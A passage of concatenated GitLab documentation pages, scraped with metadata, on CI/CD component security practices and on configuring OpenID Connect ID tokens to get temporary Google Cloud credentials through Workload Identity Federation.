errors } } ``` After the query completes, all components in projects in the root namespace are verified. The **Verified creator** badge displays next to the component names in the CI/CD catalog. To remove the badge from a component, repeat the query with `UNVERIFIED` for `verificationLevel`. ## Convert a CI/CD template to a component Any existing CI/CD template that you use in projects by using the `include:` syntax can be converted to a CI/CD component: 1. Decide if you want the component to be grouped with other components as part of an existing [component project](#component-project), or [create a new component project](#create-a-component-project). 1. Create a YAML file in the component project according to the [directory structure](#directory-structure). 1. Copy the content of the original template YAML file into the new component YAML file. 1. Refactor the new component's configuration to: - Follow the guidance on [writing a component](#write-a-component). - Improve the configuration, for example by enabling [merge request pipelines](../pipelines/merge_request_pipelines.md) or making it [more efficient](../pipelines/pipeline_efficiency.md). 1. Leverage the `.gitlab-ci.yml` in the components repository to [test changes to the component](#test-the-component). 1. Tag and [release the component](#publish-a-new-release). You can learn more by following a practical example for [migrating the Go CI/CD template to CI/CD component](examples.md#cicd-component-migration-example-go). ## Use a GitLab.com component on GitLab Self-Managed {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab Self-Managed, GitLab Dedicated {{< /details >}} The CI/CD catalog of a fresh install of a GitLab instance starts with no published CI/CD components. To populate your instance's catalog, you can: - [Publish your own components](#publish-a-component-project). - Mirror components from GitLab.com in your GitLab Self-Managed instance. To mirror a GitLab.com component in your GitLab Self-Managed instance: 1. Make sure that [network outbound requests](../../security/webhooks.md) are allowed for `gitlab.com`. 1. [Create a group](../../user/group/_index.md#create-a-group) to host the component projects (recommended group: `components`). 1. [Create a mirror of the component project](../../user/project/repository/mirror/pull.md) in the new group. 1. Write a [project description](../../user/project/working_with_projects.md#edit-a-project) for the component project mirror because mirroring repositories does not copy the description. 1. [Set the self-hosted component project as a catalog resource](#set-a-component-project-as-a-catalog-project). 1. Publish [a new release](../../user/project/releases/_index.md) in the self-hosted component project by [running a pipeline](../pipelines/_index.md#run-a-pipeline-manually) for a tag (usually the latest tag). ## CI/CD component security best practices ### For component users As anyone can publish components to the catalog, you should carefully review components before using them in your project. Use of GitLab CI/CD components is at your own risk and GitLab cannot guarantee the security of third-party components. When using third-party CI/CD components, consider the following security best practices: - **Audit and review component source code**: Carefully examine the code to ensure it's free of malicious content. - **Minimize access to credentials and tokens**: - Audit the component's source code to verify that any credentials or tokens are only used to perform actions that you expect and authorize. - Use minimally scoped access tokens. - Avoid using long-lived access tokens or credentials. - Audit use of credentials and tokens used by CI/CD components. - **Use pinned versions**: Pin CI/CD components to a specific commit SHA (preferred) or release version tag to ensure the integrity of the component used in a pipeline. Only use release tags if you trust the component maintainer. Avoid using `latest`. - **Store secrets securely**: Do not store secrets in CI/CD configuration files. Avoid storing secrets and credentials in project settings if you can use an external secret management solution instead. - **Use ephemeral, isolated runner environments**: Run component jobs in temporary, isolated environments when possible. Be aware of [security risks](https://docs.gitlab.com/runner/security) with self-managed runners. - **Securely handle cache and artifacts**: Do not pass cache or artifacts from other jobs in your pipeline to CI/CD component jobs unless absolutely necessary. - **Limit CI_JOB_TOKEN access**: Restrict [CI/CD job token (`CI_JOB_TOKEN`) project access and permissions](../jobs/ci_job_token.md#control-job-token-access-to-your-project) for projects using CI/CD components. - **Review CI/CD component changes**: Carefully review all changes to the CI/CD component configuration before changing to use an updated commit SHA or release tag for the component. - **Audit custom container images**: Carefully review any custom container images used by the CI/CD component to ensure they are free of malicious content. ### For component maintainers To maintain secure and trustworthy CI/CD components and ensure the integrity of the pipeline configuration you deliver to users, follow these best practices: - **Use two-factor authentication (2FA)**: Ensure all CI/CD component project maintainers and owners have [2FA enabled](../../user/profile/account/two_factor_authentication.md#enable-two-factor-authentication), or enforce [2FA for all users in the group](../../security/two_factor_authentication.md#enforce-2fa-for-all-users-in-a-group). - **Use protected branches**: - Use [protected branches](../../user/project/repository/branches/protected.md) for component project releases. - Protect the default branch, and protect all release branches [using wildcard rules](../../user/project/repository/branches/protected.md#use-wildcard-rules). - Require everyone submit merge requests for changes to protected branches. Set the **Allowed to push and merge** option to `No one` for protected branches. - Block force pushes to protected branches. - **Sign all commits**: [Sign all commits](../../user/project/repository/signed_commits/_index.md) to the component project. - **Discourage using `latest`**: Avoid including examples in your `README.md` that use `@latest`. - **Limit dependency on caches and artifacts from other jobs**: Only use cache and artifacts from other jobs in CI/CD components if absolutely necessary - **Update CI/CD component dependencies**: Check for and apply updates to dependencies regularly. - **Review changes carefully**: - Carefully review all changes to the CI/CD component pipeline configuration before merging into default or release branches. - Use [merge request approvals](../../user/project/merge_requests/approvals/_index.md) for all user-facing changes to CI/CD component catalog projects. ## Troubleshooting ### `content not found` message You might receive an error message similar to the following when using the `~latest` version qualifier to reference a component hosted by a [catalog project](#set-a-component-project-as-a-catalog-project): ```plaintext This GitLab CI configuration is invalid: Component 'gitlab.com/my-namespace/my-project/my-component@~latest' - content not found ``` The `~latest` behavior [was updated](https://gitlab.com/gitlab-org/gitlab/-/issues/442238) in GitLab 16.10. It now refers to the latest semantic version of the catalog resource. To resolve this issue, [create a new release](#publish-a-new-release). ### Error: `Build component error: Spec must be a valid json schema` If a component has invalid formatting, you might not be able to create a release and could receive an error like `Build component error: Spec must be a valid json schema`. This error can be caused by an empty `spec:inputs` section. If your configuration does not use any inputs, you can make the `spec` section empty instead. For example: ```yaml spec: --- my-component: script: echo ```
https://docs.gitlab.com/ci/cloud_services
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/_index.md
2025-08-13
doc/ci/cloud_services
[ "doc", "ci", "cloud_services" ]
_index.md
Software Supply Chain Security
Pipeline Security
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Connect to cloud services
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [ID tokens](../yaml/_index.md#id_tokens) to support any OIDC provider, including HashiCorp Vault, [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/356986) in GitLab 15.7. {{< /history >}} {{< alert type="warning" >}} `CI_JOB_JWT` and `CI_JOB_JWT_V2` were [deprecated in GitLab 15.9](../../update/deprecations.md#old-versions-of-json-web-tokens-are-deprecated) and are scheduled to be removed in GitLab 17.0. Use [ID tokens](../yaml/_index.md#id_tokens) instead. {{< /alert >}} GitLab CI/CD supports [OpenID Connect (OIDC)](https://openid.net/developers/how-connect-works/) to give your build and deployment jobs access to cloud credentials and services. Historically, teams stored secrets in projects or applied permissions on the GitLab Runner instance to build and deploy. OIDC capable [ID tokens](../yaml/_index.md#id_tokens) are configurable in the CI/CD job allowing you to follow a scalable and least-privilege security approach. In GitLab 15.6 and earlier, you must use `CI_JOB_JWT_V2` instead of an ID token, but it is not customizable. ## Prerequisites - Account on GitLab. - Access to a cloud provider that supports OIDC to configure authorization and create roles. ID tokens support cloud providers with OIDC, including: - AWS - Azure - GCP - HashiCorp Vault {{< alert type="note" >}} Configuring OIDC enables JWT token access to the target environments for all pipelines. When you configure OIDC for a pipeline, you should complete a software supply chain security review for the pipeline, focusing on the additional access. For more information about supply chain attacks, see [How a DevOps Platform helps protect against supply chain attacks](https://about.gitlab.com/blog/2021/04/28/devops-platform-supply-chain-attacks/). {{< /alert >}} ## Use cases - Removes the need to store secrets in your GitLab group or project. Temporary credentials can be retrieved from your cloud provider through OIDC. - Provides temporary access to cloud resources with granular GitLab conditionals including a group, project, branch, or tag. - Enables you to define separation of duties in the CI/CD job with conditional access to environments. Historically, apps may have been deployed with a designated GitLab Runner that had only access to staging or production environments. This led to Runner sprawl as each machine had dedicated permissions. - Allows instance runners to securely access multiple cloud accounts. The access is determined by the JWT token, which is specific to the user running the pipeline. - Removes the need to create logic to rotate secrets by retrieving temporary credentials by default. ## ID token authentication for cloud services Each job can be configured with ID tokens, which are provided as a CI/CD variable containing the [token payload](../secrets/id_token_authentication.md#token-payload). These JWTs can be used to authenticate with the OIDC-supported cloud provider such as AWS, Azure, GCP, or Vault. ### Authorization workflow ```mermaid %%{init: { "fontFamily": "GitLab Sans" }}%% sequenceDiagram accTitle: Authorization workflow accDescr: The flow of authorization requests between GitLab and a cloud provider. participant GitLab Note right of Cloud: Create OIDC identity provider Note right of Cloud: Create role with conditionals Note left of GitLab: CI/CD job with ID token GitLab->>+Cloud: Call cloud API with ID token Note right of Cloud: Decode & verify JWT with public key (https://gitlab.com/oauth/discovery/keys) Note right of Cloud: Validate audience defined in OIDC Note right of Cloud: Validate conditional (sub, aud) role Note right of Cloud: Generate credential or fetch secret Cloud->>GitLab: Return temporary credential Note left of GitLab: Perform operation ``` 1. Create an OIDC identity provider in the cloud (for example, AWS, Azure, GCP, Vault). 1. Create a conditional role in the cloud service that filters to a group, project, branch, or tag. 1. The CI/CD job includes an ID token which is a JWT token. You can use this token for authorization with your cloud API. 1. The cloud verifies the token, validates the conditional role from the payload, and returns a temporary credential. ## Configure a conditional role with OIDC claims To configure the trust between GitLab and OIDC, you must create a conditional role in the cloud provider that checks against the JWT. The condition is validated against the JWT to create a trust specifically against two claims, the audience and subject. - Audience or `aud`: Configured as part of the ID token: ```yaml job_needing_oidc_auth: id_tokens: OIDC_TOKEN: aud: https://oidc.provider.com script: - echo $OIDC_TOKEN ``` - Subject or `sub`: A concatenation of metadata describing the GitLab CI/CD workflow including the group, project, branch, and tag. The `sub` field is in the following format: - `project_path:{group}/{project}:ref_type:{type}:ref:{branch_name}` | Filter type | Example | |----------------------------------------------------|---------| | Filter to any branch | Wildcard supported. `project_path:mygroup/myproject:ref_type:branch:ref:*` | | Filter to specific project, main branch | `project_path:mygroup/myproject:ref_type:branch:ref:main` | | Filter to all projects under a group | Wildcard supported. `project_path:mygroup/*:ref_type:branch:ref:main` | | Filter to a Git tag | Wildcard supported. `project_path:mygroup/*:ref_type:tag:ref:1.0` | ## OIDC authorization with your cloud provider To connect with your cloud provider, see the following tutorials: - [Configure OpenID Connect in AWS](aws/_index.md) - [Configure OpenID Connect in Azure](azure/_index.md) - [Configure OpenID Connect in Google Cloud](google_cloud/_index.md)
--- stage: Software Supply Chain Security group: Pipeline Security info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Connect to cloud services breadcrumbs: - doc - ci - cloud_services --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [ID tokens](../yaml/_index.md#id_tokens) to support any OIDC provider, including HashiCorp Vault, [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/356986) in GitLab 15.7. {{< /history >}} {{< alert type="warning" >}} `CI_JOB_JWT` and `CI_JOB_JWT_V2` were [deprecated in GitLab 15.9](../../update/deprecations.md#old-versions-of-json-web-tokens-are-deprecated) and are scheduled to be removed in GitLab 17.0. Use [ID tokens](../yaml/_index.md#id_tokens) instead. {{< /alert >}} GitLab CI/CD supports [OpenID Connect (OIDC)](https://openid.net/developers/how-connect-works/) to give your build and deployment jobs access to cloud credentials and services. Historically, teams stored secrets in projects or applied permissions on the GitLab Runner instance to build and deploy. OIDC capable [ID tokens](../yaml/_index.md#id_tokens) are configurable in the CI/CD job allowing you to follow a scalable and least-privilege security approach. In GitLab 15.6 and earlier, you must use `CI_JOB_JWT_V2` instead of an ID token, but it is not customizable. ## Prerequisites - Account on GitLab. - Access to a cloud provider that supports OIDC to configure authorization and create roles. ID tokens support cloud providers with OIDC, including: - AWS - Azure - GCP - HashiCorp Vault {{< alert type="note" >}} Configuring OIDC enables JWT token access to the target environments for all pipelines. When you configure OIDC for a pipeline, you should complete a software supply chain security review for the pipeline, focusing on the additional access. For more information about supply chain attacks, see [How a DevOps Platform helps protect against supply chain attacks](https://about.gitlab.com/blog/2021/04/28/devops-platform-supply-chain-attacks/). {{< /alert >}} ## Use cases - Removes the need to store secrets in your GitLab group or project. Temporary credentials can be retrieved from your cloud provider through OIDC. - Provides temporary access to cloud resources with granular GitLab conditionals including a group, project, branch, or tag. - Enables you to define separation of duties in the CI/CD job with conditional access to environments. Historically, apps may have been deployed with a designated GitLab Runner that had only access to staging or production environments. This led to Runner sprawl as each machine had dedicated permissions. - Allows instance runners to securely access multiple cloud accounts. The access is determined by the JWT token, which is specific to the user running the pipeline. - Removes the need to create logic to rotate secrets by retrieving temporary credentials by default. ## ID token authentication for cloud services Each job can be configured with ID tokens, which are provided as a CI/CD variable containing the [token payload](../secrets/id_token_authentication.md#token-payload). These JWTs can be used to authenticate with the OIDC-supported cloud provider such as AWS, Azure, GCP, or Vault. ### Authorization workflow ```mermaid %%{init: { "fontFamily": "GitLab Sans" }}%% sequenceDiagram accTitle: Authorization workflow accDescr: The flow of authorization requests between GitLab and a cloud provider. participant GitLab Note right of Cloud: Create OIDC identity provider Note right of Cloud: Create role with conditionals Note left of GitLab: CI/CD job with ID token GitLab->>+Cloud: Call cloud API with ID token Note right of Cloud: Decode & verify JWT with public key (https://gitlab.com/oauth/discovery/keys) Note right of Cloud: Validate audience defined in OIDC Note right of Cloud: Validate conditional (sub, aud) role Note right of Cloud: Generate credential or fetch secret Cloud->>GitLab: Return temporary credential Note left of GitLab: Perform operation ``` 1. Create an OIDC identity provider in the cloud (for example, AWS, Azure, GCP, Vault). 1. Create a conditional role in the cloud service that filters to a group, project, branch, or tag. 1. The CI/CD job includes an ID token which is a JWT token. You can use this token for authorization with your cloud API. 1. The cloud verifies the token, validates the conditional role from the payload, and returns a temporary credential. ## Configure a conditional role with OIDC claims To configure the trust between GitLab and OIDC, you must create a conditional role in the cloud provider that checks against the JWT. The condition is validated against the JWT to create a trust specifically against two claims, the audience and subject. - Audience or `aud`: Configured as part of the ID token: ```yaml job_needing_oidc_auth: id_tokens: OIDC_TOKEN: aud: https://oidc.provider.com script: - echo $OIDC_TOKEN ``` - Subject or `sub`: A concatenation of metadata describing the GitLab CI/CD workflow including the group, project, branch, and tag. The `sub` field is in the following format: - `project_path:{group}/{project}:ref_type:{type}:ref:{branch_name}` | Filter type | Example | |----------------------------------------------------|---------| | Filter to any branch | Wildcard supported. `project_path:mygroup/myproject:ref_type:branch:ref:*` | | Filter to specific project, main branch | `project_path:mygroup/myproject:ref_type:branch:ref:main` | | Filter to all projects under a group | Wildcard supported. `project_path:mygroup/*:ref_type:branch:ref:main` | | Filter to a Git tag | Wildcard supported. `project_path:mygroup/*:ref_type:tag:ref:1.0` | ## OIDC authorization with your cloud provider To connect with your cloud provider, see the following tutorials: - [Configure OpenID Connect in AWS](aws/_index.md) - [Configure OpenID Connect in Azure](azure/_index.md) - [Configure OpenID Connect in Google Cloud](google_cloud/_index.md)
https://docs.gitlab.com/ci/cloud_services/google_cloud
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/cloud_services/_index.md
2025-08-13
doc/ci/cloud_services/google_cloud
[ "doc", "ci", "cloud_services", "google_cloud" ]
_index.md
Software Supply Chain Security
Pipeline Security
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Configure OpenID Connect with GCP Workload Identity Federation
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< alert type="warning" >}} `CI_JOB_JWT_V2` was [deprecated in GitLab 15.9](../../../update/deprecations.md#old-versions-of-json-web-tokens-are-deprecated) and is scheduled to be removed in GitLab 17.0. Use [ID tokens](../../yaml/_index.md#id_tokens) instead. {{< /alert >}} This tutorial demonstrates authenticating to Google Cloud from a GitLab CI/CD job using a JSON Web Token (JWT) token and Workload Identity Federation. This configuration generates on-demand, short-lived credentials without needing to store any secrets. To get started, configure OpenID Connect (OIDC) for identity federation between GitLab and Google Cloud. For more information on using OIDC with GitLab, read [Connect to cloud services](../_index.md). This tutorial assumes you have a Google Cloud account and a Google Cloud project. Your account must have at least the **workload identity pool Admin** permission on the Google Cloud project. {{< alert type="note" >}} If you would prefer to use a Terraform module and a CI/CD template instead of this tutorial, see [How OIDC can simplify authentication of GitLab CI/CD pipelines with Google Cloud](https://about.gitlab.com/blog/2023/06/28/introduction-of-oidc-modules-for-integration-between-google-cloud-and-gitlab-ci/). {{< /alert >}} To complete this tutorial: 1. [Create the Google Cloud workload identity pool](#create-the-google-cloud-workload-identity-pool). 1. [Create a workload identity provider](#create-a-workload-identity-provider). 1. [Grant permissions for service account impersonation](#grant-permissions-for-service-account-impersonation). 1. [Retrieve a temporary credential](#retrieve-a-temporary-credential). ## Create the Google Cloud workload identity pool [Create a new Google Cloud workload identity pool](https://cloud.google.com/iam/docs/workload-identity-federation-with-other-clouds#create_the_workload_identity_pool_and_provider) with the following options: - **Name**: Human-friendly name for the workload identity pool, such as `GitLab`. - **Pool ID**: Unique ID in the Google Cloud project for the workload identity pool, such as `gitlab`. This value is used to refer to the pool and appears in URLs. - **Description**: Optional. A description of the pool. - **Enabled Pool**: Ensure this option is `true`. We recommend creating a single pool per GitLab installation per Google Cloud project. If you have multiple GitLab repositories and CI/CD jobs on the same GitLab instance, they can authenticate using different providers against the same pool. ## Create a workload identity provider [Create a new Google Cloud workload identity provider](https://cloud.google.com/iam/docs/workload-identity-federation-with-other-clouds#create_the_workload_identity_pool_and_provider) inside the workload identity pool created in the previous step, using the following options: - **Provider type**: OpenID Connect (OIDC). - **Provider name**: Human-friendly name for the workload identity provider, such as `gitlab/gitlab`. - **Provider ID**: Unique ID in the pool for the workload identity provider, such as `gitlab-gitlab`. This value is used to refer to the provider, and appears in URLs. - **Issuer (URL)**: The address of your GitLab instance, such as `https://gitlab.com/` or `https://gitlab.example.com/`. - The address must use the `https://` protocol. - The address must end in a trailing slash. - **Audiences**: Manually set the allowed audiences list to the address of your GitLab instance, such as `https://gitlab.com` or `https://gitlab.example.com`. - The address must use the `https://` protocol. - The address must not end in a trailing slash. - **Provider attributes mapping**: Create the following mappings, where `attribute.X` is the name of the attribute to be included as a claim in the Google token, and `assertion.X` is the value to extract from the [GitLab claim](../_index.md#id-token-authentication-for-cloud-services): | Attribute (on Google) | Assertion (from GitLab) | | --- | --- | | `google.subject` | `assertion.sub` | | `attribute.X` | `assertion.X` | You can also [build complex attributes](https://cloud.google.com/iam/docs/workload-identity-federation#mapping) using Common Expression Language (CEL). You must map every attribute that you want to use for permission granting. For example, if you want to map permissions in the next step based on the user's email address, you must map `attribute.user_email` to `assertion.user_email`. {{< alert type="warning" >}} For projects hosted on GitLab.com, GCP requires you to [limit access to only tokens issued by your GitLab group](https://cloud.google.com/iam/docs/workload-identity-federation-with-deployment-pipelines#gitlab-saas_2). {{< /alert >}} ## Grant permissions for Service Account impersonation Creating the workload identity pool and workload identity provider defines the authentication into Google Cloud. At this point, you can authenticate from GitLab CI/CD job into Google Cloud. However, you have no permissions on Google Cloud (authorization). To grant your GitLab CI/CD job permissions on Google Cloud, you must: 1. [Create a Google Cloud Service Account](https://cloud.google.com/iam/docs/service-accounts-create). You can use whatever name and ID you prefer. 1. [Grant IAM permissions](https://cloud.google.com/iam/docs/granting-changing-revoking-access) to your service account on Google Cloud resources. These permissions vary significantly based on your use case. In general, grant this service account the permissions on your Google Cloud project and resources you want your GitLab CI/CD job to be able to use. For example, if you needed to upload a file to a Google Cloud Storage bucket in your GitLab CI/CD job, you would grant this Service Account the `roles/storage.objectCreator` role on your Cloud Storage bucket. 1. [Grant the external identity permissions](https://cloud.google.com/iam/docs/workload-identity-federation-with-other-clouds#impersonate) to impersonate that Service Account. This step enables a GitLab CI/CD job to authorize to Google Cloud, via Service Account impersonation. This step grants an IAM permission on the Service Account itself, giving the external identity permissions to act as that service account. External identities are expressed using the `principalSet://` protocol. Much like the previous step, this step depends heavily on your desired configuration. For example, to allow a GitLab CI/CD job to impersonate a Service Account named `my-service-account` if the GitLab CI/CD job was initiated by a GitLab user with the username `chris`, you would grant the `roles/iam.workloadIdentityUser` IAM role to the external identity on `my-service-account`. The external identity takes the format: ```plaintext principalSet://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/attribute.user_login/chris ``` where `PROJECT_NUMBER` is your Google Cloud project number, and `POOL_ID` is the ID (not name) of the workload identity pool created in the first section. This configuration also assumes you added `user_login` as an attribute mapped from the assertion in the previous section. ## Retrieve a temporary credential After you configure the OIDC and role, the GitLab CI/CD job can retrieve a temporary credential from the [Google Cloud Security Token Service (STS)](https://cloud.google.com/iam/docs/reference/sts/rest). Add `id_tokens` to your CI/CD job: ```yaml job: id_tokens: GITLAB_OIDC_TOKEN: aud: https://gitlab.example.com ``` Get temporary credentials using the ID token: ```shell PAYLOAD="$(cat <<EOF { "audience": "//iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/providers/PROVIDER_ID", "grantType": "urn:ietf:params:oauth:grant-type:token-exchange", "requestedTokenType": "urn:ietf:params:oauth:token-type:access_token", "scope": "https://www.googleapis.com/auth/cloud-platform", "subjectTokenType": "urn:ietf:params:oauth:token-type:jwt", "subjectToken": "${GITLAB_OIDC_TOKEN}" } EOF )" ``` ```shell FEDERATED_TOKEN="$(curl --fail "https://sts.googleapis.com/v1/token" \ --header "Accept: application/json" \ --header "Content-Type: application/json" \ --data "${PAYLOAD}" \ | jq -r '.access_token' )" ``` Where: - `PROJECT_NUMBER` is your Google Cloud project number (not name). - `POOL_ID` is the ID of the workload identity pool created in the first section. - `PROVIDER_ID` is the ID of the workload identity provider created in the second section. - `GITLAB_OIDC_TOKEN` is an OIDC [ID token](../../yaml/_index.md#id_tokens). You can then use the resulting federated token to impersonate the service account created in the previous section: ```shell ACCESS_TOKEN="$(curl --fail "https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/SERVICE_ACCOUNT_EMAIL:generateAccessToken" \ --header "Accept: application/json" \ --header "Content-Type: application/json" \ --header "Authorization: Bearer FEDERATED_TOKEN" \ --data '{"scope": ["https://www.googleapis.com/auth/cloud-platform"]}' \ | jq -r '.accessToken' )" ``` Where: - `SERVICE_ACCOUNT_EMAIL` is the full email address of the service account to impersonate, created in the previous section. - `FEDERATED_TOKEN` is the federated token retrieved from the previous step. The result is a Google Cloud OAuth 2.0 access token, which you can use to authenticate to most Google Cloud APIs and services when used as a bearer token. You can also pass this value to the `gcloud` CLI by setting the environment variable `CLOUDSDK_AUTH_ACCESS_TOKEN`. ## Working example Review this [reference project](https://gitlab.com/guided-explorations/gcp/configure-openid-connect-in-gcp) for provisioning OIDC in GCP using Terraform and a sample script to retrieve temporary credentials. ## Troubleshooting - When debugging `curl` responses, install the latest version of curl. Use `--fail-with-body` instead of `-f`. This command prints the entire body, which can contain helpful error messages. - For more information, see [Troubleshoot Workload Identity Federation](https://cloud.google.com/iam/docs/troubleshooting-workload-identity-federation).
--- stage: Software Supply Chain Security group: Pipeline Security info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Configure OpenID Connect with GCP Workload Identity Federation breadcrumbs: - doc - ci - cloud_services - google_cloud --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< alert type="warning" >}} `CI_JOB_JWT_V2` was [deprecated in GitLab 15.9](../../../update/deprecations.md#old-versions-of-json-web-tokens-are-deprecated) and is scheduled to be removed in GitLab 17.0. Use [ID tokens](../../yaml/_index.md#id_tokens) instead. {{< /alert >}} This tutorial demonstrates authenticating to Google Cloud from a GitLab CI/CD job using a JSON Web Token (JWT) token and Workload Identity Federation. This configuration generates on-demand, short-lived credentials without needing to store any secrets. To get started, configure OpenID Connect (OIDC) for identity federation between GitLab and Google Cloud. For more information on using OIDC with GitLab, read [Connect to cloud services](../_index.md). This tutorial assumes you have a Google Cloud account and a Google Cloud project. Your account must have at least the **workload identity pool Admin** permission on the Google Cloud project. {{< alert type="note" >}} If you would prefer to use a Terraform module and a CI/CD template instead of this tutorial, see [How OIDC can simplify authentication of GitLab CI/CD pipelines with Google Cloud](https://about.gitlab.com/blog/2023/06/28/introduction-of-oidc-modules-for-integration-between-google-cloud-and-gitlab-ci/). {{< /alert >}} To complete this tutorial: 1. [Create the Google Cloud workload identity pool](#create-the-google-cloud-workload-identity-pool). 1. [Create a workload identity provider](#create-a-workload-identity-provider). 1. [Grant permissions for service account impersonation](#grant-permissions-for-service-account-impersonation). 1. [Retrieve a temporary credential](#retrieve-a-temporary-credential). ## Create the Google Cloud workload identity pool [Create a new Google Cloud workload identity pool](https://cloud.google.com/iam/docs/workload-identity-federation-with-other-clouds#create_the_workload_identity_pool_and_provider) with the following options: - **Name**: Human-friendly name for the workload identity pool, such as `GitLab`. - **Pool ID**: Unique ID in the Google Cloud project for the workload identity pool, such as `gitlab`. This value is used to refer to the pool and appears in URLs. - **Description**: Optional. A description of the pool. - **Enabled Pool**: Ensure this option is `true`. We recommend creating a single pool per GitLab installation per Google Cloud project. If you have multiple GitLab repositories and CI/CD jobs on the same GitLab instance, they can authenticate using different providers against the same pool. ## Create a workload identity provider [Create a new Google Cloud workload identity provider](https://cloud.google.com/iam/docs/workload-identity-federation-with-other-clouds#create_the_workload_identity_pool_and_provider) inside the workload identity pool created in the previous step, using the following options: - **Provider type**: OpenID Connect (OIDC). - **Provider name**: Human-friendly name for the workload identity provider, such as `gitlab/gitlab`. - **Provider ID**: Unique ID in the pool for the workload identity provider, such as `gitlab-gitlab`. This value is used to refer to the provider, and appears in URLs. - **Issuer (URL)**: The address of your GitLab instance, such as `https://gitlab.com/` or `https://gitlab.example.com/`. - The address must use the `https://` protocol. - The address must end in a trailing slash. - **Audiences**: Manually set the allowed audiences list to the address of your GitLab instance, such as `https://gitlab.com` or `https://gitlab.example.com`. - The address must use the `https://` protocol. - The address must not end in a trailing slash. - **Provider attributes mapping**: Create the following mappings, where `attribute.X` is the name of the attribute to be included as a claim in the Google token, and `assertion.X` is the value to extract from the [GitLab claim](../_index.md#id-token-authentication-for-cloud-services): | Attribute (on Google) | Assertion (from GitLab) | | --- | --- | | `google.subject` | `assertion.sub` | | `attribute.X` | `assertion.X` | You can also [build complex attributes](https://cloud.google.com/iam/docs/workload-identity-federation#mapping) using Common Expression Language (CEL). You must map every attribute that you want to use for permission granting. For example, if you want to map permissions in the next step based on the user's email address, you must map `attribute.user_email` to `assertion.user_email`. {{< alert type="warning" >}} For projects hosted on GitLab.com, GCP requires you to [limit access to only tokens issued by your GitLab group](https://cloud.google.com/iam/docs/workload-identity-federation-with-deployment-pipelines#gitlab-saas_2). {{< /alert >}} ## Grant permissions for Service Account impersonation Creating the workload identity pool and workload identity provider defines the authentication into Google Cloud. At this point, you can authenticate from GitLab CI/CD job into Google Cloud. However, you have no permissions on Google Cloud (authorization). To grant your GitLab CI/CD job permissions on Google Cloud, you must: 1. [Create a Google Cloud Service Account](https://cloud.google.com/iam/docs/service-accounts-create). You can use whatever name and ID you prefer. 1. [Grant IAM permissions](https://cloud.google.com/iam/docs/granting-changing-revoking-access) to your service account on Google Cloud resources. These permissions vary significantly based on your use case. In general, grant this service account the permissions on your Google Cloud project and resources you want your GitLab CI/CD job to be able to use. For example, if you needed to upload a file to a Google Cloud Storage bucket in your GitLab CI/CD job, you would grant this Service Account the `roles/storage.objectCreator` role on your Cloud Storage bucket. 1. [Grant the external identity permissions](https://cloud.google.com/iam/docs/workload-identity-federation-with-other-clouds#impersonate) to impersonate that Service Account. This step enables a GitLab CI/CD job to authorize to Google Cloud, via Service Account impersonation. This step grants an IAM permission on the Service Account itself, giving the external identity permissions to act as that service account. External identities are expressed using the `principalSet://` protocol. Much like the previous step, this step depends heavily on your desired configuration. For example, to allow a GitLab CI/CD job to impersonate a Service Account named `my-service-account` if the GitLab CI/CD job was initiated by a GitLab user with the username `chris`, you would grant the `roles/iam.workloadIdentityUser` IAM role to the external identity on `my-service-account`. The external identity takes the format: ```plaintext principalSet://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/attribute.user_login/chris ``` where `PROJECT_NUMBER` is your Google Cloud project number, and `POOL_ID` is the ID (not name) of the workload identity pool created in the first section. This configuration also assumes you added `user_login` as an attribute mapped from the assertion in the previous section. ## Retrieve a temporary credential After you configure the OIDC and role, the GitLab CI/CD job can retrieve a temporary credential from the [Google Cloud Security Token Service (STS)](https://cloud.google.com/iam/docs/reference/sts/rest). Add `id_tokens` to your CI/CD job: ```yaml job: id_tokens: GITLAB_OIDC_TOKEN: aud: https://gitlab.example.com ``` Get temporary credentials using the ID token: ```shell PAYLOAD="$(cat <<EOF { "audience": "//iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/providers/PROVIDER_ID", "grantType": "urn:ietf:params:oauth:grant-type:token-exchange", "requestedTokenType": "urn:ietf:params:oauth:token-type:access_token", "scope": "https://www.googleapis.com/auth/cloud-platform", "subjectTokenType": "urn:ietf:params:oauth:token-type:jwt", "subjectToken": "${GITLAB_OIDC_TOKEN}" } EOF )" ``` ```shell FEDERATED_TOKEN="$(curl --fail "https://sts.googleapis.com/v1/token" \ --header "Accept: application/json" \ --header "Content-Type: application/json" \ --data "${PAYLOAD}" \ | jq -r '.access_token' )" ``` Where: - `PROJECT_NUMBER` is your Google Cloud project number (not name). - `POOL_ID` is the ID of the workload identity pool created in the first section. - `PROVIDER_ID` is the ID of the workload identity provider created in the second section. - `GITLAB_OIDC_TOKEN` is an OIDC [ID token](../../yaml/_index.md#id_tokens). You can then use the resulting federated token to impersonate the service account created in the previous section: ```shell ACCESS_TOKEN="$(curl --fail "https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/SERVICE_ACCOUNT_EMAIL:generateAccessToken" \ --header "Accept: application/json" \ --header "Content-Type: application/json" \ --header "Authorization: Bearer 